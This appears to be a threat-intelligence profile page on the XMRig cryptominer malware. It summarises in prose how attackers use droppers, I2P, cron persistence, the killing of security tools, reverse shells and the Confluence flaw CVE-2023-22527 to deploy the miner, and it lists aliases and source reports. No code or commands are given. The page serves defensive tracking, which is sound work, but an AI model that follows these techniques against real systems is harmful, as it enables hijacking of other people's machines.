Xmrig Miner

Malware updated 4 days ago (2024-09-12T13:17:43.297Z)

Download STIX

Preview STIX

The XMRig miner is a type of malware that is used to exploit computer systems for cryptocurrency mining. It is an open-source CPU/GPU miner supporting numerous protocols, and is typically installed through a dropper, which orchestrates the installation and execution of the miner. The dropper also installs I2P tooling, a legitimate application, and utilizes I2P to download a custom XMRig miner, coordinating the mining operations. This process involves the generation and execution of a script to download, configure, and execute a copy of the XMRig miner. In some instances, the XMRig Download Script sends the miner a configuration via its native API. This malware parallels a yearlong campaign revealed by Wiz in July, which used Selenium Grid as a vector to deploy the XMRig miner. The attackers use multiple cron jobs to maintain persistence, disable all security tools, and then download the XMRig miner to begin mining activities. For Windows operating systems, the threat actors use a malicious script that downloads all the necessary tools for unpacking and executing the Xmrig miner. They leverage the Selenium WebDriver API to run Python with a reverse shell, deploying scripts to download a modified version of the XMRig miner. The first threat actor using the XMRig miner executes mining activity via an ELF file payload. After ensuring all cloud monitoring and security services are terminated or deleted, the attacker exploits CVE-2023-22527, terminates the entry point process, and downloads the XMRig miner to begin mining activities. This process hijacks system resources, disrupting normal operations. The attack includes creating an “AddinProcess.exe” process that hosts the XMRig miner, writing the XMRig payload within this process, and running it.

Description last updated: 2024-09-12T13:15:41.844Z

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.

ID	Votes	Profile Description
Xmrig	8	XMRig is a type of malware that infiltrates systems to exploit them for malicious activities, such as cryptocurrency mining, DDOS attacks, spam distribution, and data theft. The dropper, which orchestrates the installation and execution of this malware, uses legitimate applications like the I2P tool
Pyloose	2	In July, Wiz researchers issued a warning about PyLoose, a malicious software (malware) composed of Python code. This malware is designed to covertly load an XMRig miner—a program used for cryptocurrency mining—into a computer's memory using the memfd Linux fileless process. This technique allows th

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Payload

Python

Malware

Docker

Loader

Linux

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Associated Vulnerabilities

To see the evidence that has resulted in these vulnerability associations, create a free account

ID	Type	Votes	Profile Description
CVE-2023-22527	Unspecified	2	CVE-2023-22527 is a critical vulnerability found in Atlassian's Confluence Server and Data Center. This flaw, rated 10 out of 10 on the CVSS v3 scale, is a template injection issue that allows an unauthenticated attacker to execute remote code. The vulnerability specifically affects outdated version

Source Document References

Information about the Xmrig Miner Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
DARKReading	4 days ago	Hackers Proxyjack & Cryptomine Selenium Grid Servers
Securityaffairs	17 days ago	Threat actors exploit Atlassian Confluence bug in cryptomining campaigns
DARKReading	19 days ago	Attackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking
Trend Micro	20 days ago	Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem
MITRE	2 years ago	TeamTNT with new campaign aka “Chimaera”
Checkpoint	a month ago	29th July – Threat Intelligence Report - Check Point Research
Trend Micro	3 months ago	Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer
Securityaffairs	3 months ago	Cryptojacking campaign targets exposed Docker APIs
DARKReading	4 months ago	Novel EDR-Killing 'GhostEngine' Malware Is Built for Stealth
Fortinet	2 years ago	2022 IoT Threat Review \| FortiGuard Labs
CERT-EU	a year ago	Meet PyLoose – First Python-Based Fileless Attack in the Wild
CERT-EU	a year ago	Andoryu Botnet Exploits Critical Ruckus Wireless Flaw for Widespread Attack
DARKReading	6 months ago	'Fluffy Wolf' Spreads Meta Stealer in Corporate Phishing Campaign
CERT-EU	8 months ago	Cyber Security Week in Review: January 19, 2024
InfoSecurity-magazine	8 months ago	New Malware Campaign Exploits 9hits in Docker Assault
CERT-EU	8 months ago	‘Yet another Mirai-based botnet’ is spreading an illicit cryptominer
MITRE	2 years ago	Blue Mockingbird activity mines Monero cryptocurrency
CERT-EU	8 months ago	New Malware Exploits 9Hits, Turns Docker Servers into Traffic Boosted Crypto Miners
CERT-EU	a year ago	Leftover Links 14/07/2023: Microsoft in Trouble With the FTC Again, This Time Over 'Open' 'AI'
CrowdStrike	2 years ago	CrowdStrike Uncovers I2Pminer MacOS Mineware Variant